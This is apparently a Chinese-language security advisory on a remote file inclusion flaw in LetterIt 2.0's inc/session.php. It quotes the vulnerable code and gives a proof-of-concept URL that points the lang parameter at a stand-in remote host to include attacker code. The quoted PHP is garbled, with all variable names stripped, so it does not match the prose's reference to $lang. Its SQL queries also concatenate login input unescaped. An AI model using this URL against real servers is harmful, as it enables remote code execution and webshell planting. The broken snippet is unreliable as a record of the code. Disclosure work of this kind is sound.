LetterIt 2.0 - (inc/session.php) Remote File Include Vulnerability

**漏洞软件：LetterIt 2.0 软件下载：http://sourceforge.net/projects/letterit.berlios/ 漏洞类型：RFI 远程文件包含漏洞** # 软件介绍： LetterIt 2.0 是一个基于WEB页面的邮件列表管理器，安装简单并且支持多国语言。它可以通过PHP Mail，sendmail，qmail，SMTP 或者pickup mode（Windows下）等多种方式发送HTML 或者 Text文本消息以及附件到指定邮件列表。 # 漏洞分析： 这个远程文件包含漏洞出现在LetterIt 2.0的 “inc/session.php” 文件中。 漏洞代码： ``` ...截断... if(=="0") { = mysql_query("SELECT * FROM letterit_user WHERE Login='".['le_login']."' AND Passwort='".['le_passwort']."'"); = mysql_fetch_array(); if(["Status"]=="-1") = "1"; else = "0"; include(."/".["Sprache"].".php"); if(["Status"]!="1" && check_var('action')) { = mysql_query("SELECT * FROM letterit_rechte WHERE UID='".["UID"]."'"); while( = mysql_fetch_array()) [[BID]][[action]] = "1"; } } ...截断... ``` 注意这句： ``` include(."/".["Sprache"].".php"); ``` 其中**$lang**变量来自客户端，且并没有进行任何检查过滤，直接作为参数被**include**函数调用，从而引入了文件包含漏洞。 漏洞验证： http://localhost/path/inc/session.php?sessionerror=0&lang=http://EvElCoDe.txt? 取决于服务器的系统配置，该漏洞可以导致攻击者读取本地文件，敏感信息泄露，甚至攻击者可以利用该漏洞远程包含恶意代码，远程执行命令或者获取webshell。